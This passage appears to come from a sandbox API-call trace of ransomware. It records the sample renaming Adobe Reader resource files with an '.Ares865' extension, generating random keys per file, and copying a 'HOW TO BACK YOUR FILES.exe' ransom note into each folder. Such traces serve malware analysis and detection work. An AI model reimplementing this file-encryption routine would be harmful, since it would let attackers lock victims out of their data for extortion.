param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt.Ares865") returned 102 [0155.616] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt.ares865"), dwFlags=0x1) returned 1 [0155.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\HKSCS.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\hkscs.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.619] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=391020) returned 1 [0155.619] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.620] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.620] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.642] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.643] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.643] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.649] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="Japanese83pv.txt" | out: lpString1="Japanese83pv.txt") returned="Japanese83pv.txt" [0155.649] lstrlenW (lpString="Japanese83pv.txt") returned 16 [0155.649] lstrlenW (lpString="Ares865") returned 7 [0155.649] lstrcmpiW (lpString1="3pv.txt", lpString2="Ares865") returned -1 [0155.649] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt.Ares865") returned 109 [0155.649] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt.ares865"), dwFlags=0x1) returned 1 [0155.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\Japanese83pv.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\japanese83pv.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.652] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=205468) returned 1 [0155.653] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.654] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.654] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.669] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.670] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.670] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.673] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="JISX0208.txt" | out: lpString1="JISX0208.txt") returned="JISX0208.txt" [0155.673] lstrlenW (lpString="JISX0208.txt") returned 12 [0155.674] lstrlenW (lpString="Ares865") returned 7 [0155.674] lstrcmpiW (lpString1="208.txt", lpString2="Ares865") returned -1 [0155.674] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt.Ares865") returned 105 [0155.674] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt.ares865"), dwFlags=0x1) returned 1 [0155.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0208.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0208.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.677] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=106151) returned 1 [0155.677] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.678] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.678] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.687] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.687] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.688] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.689] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="JISX0213.txt" | out: lpString1="JISX0213.txt") returned="JISX0213.txt" [0155.689] lstrlenW (lpString="JISX0213.txt") returned 12 [0155.690] lstrlenW (lpString="Ares865") returned 7 [0155.690] lstrcmpiW (lpString1="213.txt", lpString2="Ares865") returned -1 [0155.690] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt.Ares865") returned 105 [0155.690] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt.ares865"), dwFlags=0x1) returned 1 [0155.692] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\JISX0213.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\jisx0213.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.692] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=171728) returned 1 [0155.692] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.693] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.693] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.708] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.709] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.709] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.712] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="symbol.txt" | out: lpString1="symbol.txt") returned="symbol.txt" [0155.712] lstrlenW (lpString="symbol.txt") returned 10 [0155.712] lstrlenW (lpString="Ares865") returned 7 [0155.712] lstrcmpiW (lpString1="bol.txt", lpString2="Ares865") returned 1 [0155.712] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt.Ares865") returned 103 [0155.712] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt.ares865"), dwFlags=0x1) returned 1 [0155.715] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\symbol.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\symbol.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.715] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10381) returned 1 [0155.715] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.716] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.716] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.719] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.719] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.719] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.720] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="zdingbat.txt" | out: lpString1="zdingbat.txt") returned="zdingbat.txt" [0155.720] lstrlenW (lpString="zdingbat.txt") returned 12 [0155.720] lstrlenW (lpString="Ares865") returned 7 [0155.720] lstrcmpiW (lpString1="bat.txt", lpString2="Ares865") returned 1 [0155.720] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt.Ares865") returned 105 [0155.720] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt.ares865"), dwFlags=0x1) returned 1 [0155.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.723] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11932) returned 1 [0155.723] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.724] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.724] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.727] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.728] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.728] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.729] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU" [0155.729] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU" [0155.729] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.729] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.730] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.730] GetLastError () returned 0x0 [0155.731] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.731] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834dd660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540cc760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540cc760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.731] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.731] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.731] lstrcpyW (in: lpString1=0x2cce494, lpString2="ctl_gb18030.cnv.Ares865" | out: lpString1="ctl_gb18030.cnv.Ares865") returned="ctl_gb18030.cnv.Ares865" [0155.731] lstrlenW (lpString="ctl_gb18030.cnv.Ares865") returned 23 [0155.731] lstrlenW (lpString="Ares865") returned 7 [0155.731] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0155.731] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x540cc760, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x540cc760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0155.731] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0155.731] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x834dd660, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x345f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="icudt26l.dat", cAlternateFileName="")) returned 1 [0155.731] lstrcmpiW (lpString1="icudt26l.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.731] lstrcmpiW (lpString1="icudt26l.dat", lpString2="aoldtz.exe") returned 1 [0155.732] lstrcpyW (in: lpString1=0x2cce494, lpString2="icudt26l.dat" | out: lpString1="icudt26l.dat") returned="icudt26l.dat" [0155.732] lstrlenW (lpString="icudt26l.dat") returned 12 [0155.732] lstrlenW (lpString="Ares865") returned 7 [0155.732] lstrcmpiW (lpString1="26l.dat", lpString2="Ares865") returned -1 [0155.732] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat.Ares865") returned 94 [0155.732] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat.ares865"), dwFlags=0x1) returned 1 [0155.735] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\ICU\\icudt26l.dat.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\icu\\icudt26l.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.736] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=214512) returned 1 [0155.736] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.737] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.737] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.753] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.753] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.753] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.757] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep" [0155.757] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep" [0155.757] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.757] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.758] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.759] GetLastError () returned 0x0 [0155.759] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.759] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81d5bd20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x543ec440, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x543ec440, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.759] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.759] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.759] lstrcpyW (in: lpString1=0x2cce476, lpString2="SaslPrepProfile_norm_bidi.spp" | out: lpString1="SaslPrepProfile_norm_bidi.spp") returned="SaslPrepProfile_norm_bidi.spp" [0155.759] lstrlenW (lpString="SaslPrepProfile_norm_bidi.spp") returned 29 [0155.760] lstrlenW (lpString="Ares865") returned 7 [0155.760] lstrcmpiW (lpString1="idi.spp", lpString2="Ares865") returned 1 [0155.760] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp.Ares865") returned 96 [0155.760] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp.ares865"), dwFlags=0x1) returned 1 [0155.762] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13724) returned 1 [0155.762] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.763] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.763] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.767] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.768] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.768] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.768] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics" [0155.769] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics" [0155.769] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.769] 